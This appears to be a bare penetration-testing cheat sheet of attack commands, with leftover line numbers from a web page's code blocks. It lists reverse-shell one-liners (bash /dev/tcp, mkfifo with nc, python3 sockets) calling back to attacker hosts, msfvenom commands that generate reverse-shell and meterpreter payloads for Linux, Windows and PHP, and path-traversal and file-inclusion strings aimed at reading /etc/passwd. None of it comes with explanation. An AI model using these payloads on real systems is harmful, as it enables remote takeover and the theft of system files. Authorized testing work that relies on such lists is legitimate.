1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# bash
bash -i >& /dev/tcp/1.3.3.7/1337 0>&1
/bin/bash -c "bash -i >& /dev/tcp/1.3.3.7/1337 0>&1"

# mkfifo - sh 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 1.3.3.7 1337 >/tmp/f

# python3 - sh
export RHOST="10.2.19.132";export RPORT=7777;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

# More on reverse shell generator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# Stageless
msfvenom -p linux/x64/shell_reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > meter.elf
msfvenom -p window/x64/shell_reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > shell.exe
msfvenom -p window/x64/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > meter.exe

# Staged
msfvenom -p linux/x64/shell/reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > meter.elf
msfvenom -p window/x64/shell/reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > shell.exe
msfvenom -p window/x64/meterpreter/reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > meter.exe

# Web
msfvenom -p php/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f raw > meter.php

1
2
3
4
5
6

/etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd%00 # works on php version <= 5.3.4
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd # url encode
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd # url encode twice
php://filter/convert.base64-encode/resource=PAYLOAD # wrapper